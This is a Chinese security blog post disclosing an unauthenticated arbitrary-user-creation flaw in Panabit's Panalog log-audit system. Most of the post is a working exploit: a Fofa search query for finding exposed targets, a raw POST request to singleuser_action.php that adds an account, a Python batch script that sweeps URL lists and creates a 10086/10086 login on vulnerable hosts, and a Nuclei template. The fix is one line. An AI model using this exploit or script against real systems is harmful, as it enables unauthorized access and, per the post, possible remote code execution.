panabit日志审计 singleuser_action.php 任意用户添加漏洞

admin
admin
admin
102503
文章
87
评论
2023年11月1日12:51:26评论49 views字数 5428阅读18分5秒阅读模式

panabit日志审计 singleuser_action.php 任意用户添加漏洞

panabit日志审计 singleuser_action.php 任意用户添加漏洞

漏洞简介

 

 

panabit日志审计存在 singleuser_action.php 任意用户添加漏洞,后台若存在终端命令模块可rce。

panabit日志审计 singleuser_action.php 任意用户添加漏洞

漏洞复现

 

 

步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

# 搜索语法app="Panabit-Panalog"

步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求包内容....在响应数据包的正文中返回{"yn":"yes","str":"OK"},即可登录。

POST /singleuser_action.php HTTP/1.1Host:ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Content-Length: 576Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Connection: closeContent-Type: application/x-www-form-urlencodedDnt: 1Upgrade-Insecure-Requests: 1{ "syncInfo": { "user": { "userId": "119", "userName": "119", "employeeId": "119", "departmentId": "119", "departmentName": "119", "coporationId": "119", "corporationName": "119", "userSex": "1",  "userDuty": "119", "userBirthday": "119", "userPost": "119", "userPostCode": "119", "userAlias": "119", "userRank": "119", "userPhone": "119", "userHomeAddress": "119", "userMobilePhone": "119", "userMailAddress": "119", "userMSN": "119", "userNt": "119", "userCA": "119", "userPwd": "119", "userClass": "119", "parentId": "119", "bxlx": "119" },"operationType": "ADD_USER" } }

panabit日志审计 singleuser_action.php 任意用户添加漏洞

panabit日志审计 singleuser_action.php 任意用户添加漏洞

批量脚本

 

 

import requestsimport argparsefrom datetime import datetimeimport timeimport jsonrequests.packages.urllib3.disable_warnings()
RED_BOLD = "�33[1;31m"RESET = "�33[0m"def usage():    global RED_BOLD    global RESET    text = '''    +-----------------------------------------------------------------+                微信公众号    揽月安全团队     此脚本仅用于学习或系统自检查    使用方法:        单个 python3 PanalogAddUser.py -u url[例 http://127.0.0.1:8080]        批量 python3 PanalogAddUser.py -f filename    +-----------------------------------------------------------------+         
    根据《中华人民共和国刑法》规定,违反国家规定,对计算机信息系统功能进行n删除、修改、增加、干扰,造成计算机信息系统不能正常运行的,处五年以下有期徒刑n或者拘役;后果特别严重的,处五年以上有期徒刑。    违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行n删除、修改、增加的操作,后果严重的,依照前款的规定处罚。    开始检测................................    '''    print(f"{RED_BOLD}{text}{RESET}")

# proxies = {'http':'http://127.0.0.1:10808}def save_file(url):    with open('result.txt',mode='a',encoding='utf-8') as f:        f.write(url+'n')
def poc(check_url,flag):    now_poc = datetime.now()    global RED_BOLD    global RESET    url = check_url + ""
    url = check_url + "/singleuser_action.php"
    # 定义请求头    headers = {        "Cookie": "JSESSIONID=D134FE1F426A41F0547EE420C64DBF68",        "Sec-Ch-Ua": "" Not A;Brand";v="99", "Chromium";v="92"",        "Accept": "*/*",        "X-Requested-With": "XMLHttpRequest",        "Sec-Ch-Ua-Mobile": "?0",        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36",        "Sec-Fetch-Site": "same-origin",        "Sec-Fetch-Mode": "cors",        "Sec-Fetch-Dest": "empty",        "Referer": "xxxx",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "zh-CN,zh;q=0.9",        "Connection": "close",        "Content-Type": "application/json"    }
    # 定义JSON数据    data = {        "syncInfo": {            "user": {                "userId": "10086",                "userName": "10086",                "employeeId": "10086",                "userPwd": "10086",                "userAlias": "10086",            },            "operationType": "ADD_USER"        }    }    try:        response = requests.post(url, headers=headers, data=json.dumps(data), verify=False, timeout=3)        if response.status_code == 200:            print(f'{RED_BOLD}[+]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}t{check_url}t存在任意用户添加漏洞,登录用户名:10086,密码:10086{RESET}')            save_file(check_url)        else:            print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}t{check_url}t任意用户添加漏洞不存在')
    except Exception as e:        print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}t{check_url}t无法访问,请检查目标站点是否存在')

def run(filepath):    flag = 0    urls = [x.strip() for x in open(filepath, "r").readlines()]    for u in urls:        if 'http' in u:            url = u        elif 'https' in u:            url = u        else:            url = 'http://' + u
        poc(url.strip(),flag)
def main():    parse = argparse.ArgumentParser()    parse.add_argument("-u", "--url", help="python PanalogAddUser.py -u url")    parse.add_argument("-f", "--file", help="python PanalogAddUser.py -f file")    args = parse.parse_args()    url = args.url    filepath = args.file    usage()    time.sleep(3)    if url is not None and filepath is None:        flag = 1        poc(url,flag)    elif url is None and filepath is not None:        run(filepath)    else:        usage()

if __name__ == '__main__':    main()
id: panabit-account-singleuser_action-useradd
info:  name: panabit-account-singleuser_action-useradd  author: xingyun  severity: critical  description: panabit日志审计存在 singleuser_action.php 任意用户添加漏洞,后台可rce.  tags: panabit,rce  metadata:    fofa-qeury: 'app="Panabit-Panalog"'    veified: true    max-request: 1
http:  - raw:      - |        POST /singleuser_action.php HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0        Content-Length: 576        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3        Connection: close        Content-Type: application/x-www-form-urlencoded        Dnt: 1        Upgrade-Insecure-Requests: 1

        { "syncInfo": { "user": { "userId": "{{username}}", "userName": "{{username}}", "employeeId": "{{password}}", "departmentId": "{{username}}", "departmentName": "{{username}}", "coporationId": "{{username}}", "corporationName": "{{username}}", "userSex": "1",  "userDuty": "{{username}}", "userBirthday": "{{username}}", "userPost": "{{username}}", "userPostCode": "{{username}}", "userAlias": "{{username}}", "userRank": "{{username}}", "userPhone": "{{username}}", "userHomeAddress": "{{username}}", "userMobilePhone": "{{username}}", "userMailAddress": "{{username}}", "userMSN": "{{username}}", "userNt": "{{username}}", "userCA": "{{username}}", "userPwd": "{{username}}", "userClass": "{{username}}", "parentId": "{{username}}", "bxlx": "{{username}}" },"operationType": "ADD_USER" } }
    attack: pitchfork    payloads:      username:        - 119      password:        - 119        
    matchers-condition: and    matchers:      - type: word        words:          - "text/html"         part: header              - type: word        words:          - "yes"           - "str":"OK"        part: body        condition: and                      - type: status        status:          - 200

panabit日志审计 singleuser_action.php 任意用户添加漏洞

panabit日志审计 singleuser_action.php 任意用户添加漏洞

漏洞修复

 

将系统升级到最新版本或者删除singleuser_action.php文件

 

 

 

原文始发于微信公众号(揽月安全团队):panabit日志审计 singleuser_action.php 任意用户添加漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月1日12:51:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   panabit日志审计 singleuser_action.php 任意用户添加漏洞http://cn-sec.com/archives/2164783.html

发表评论

匿名网友 填写信息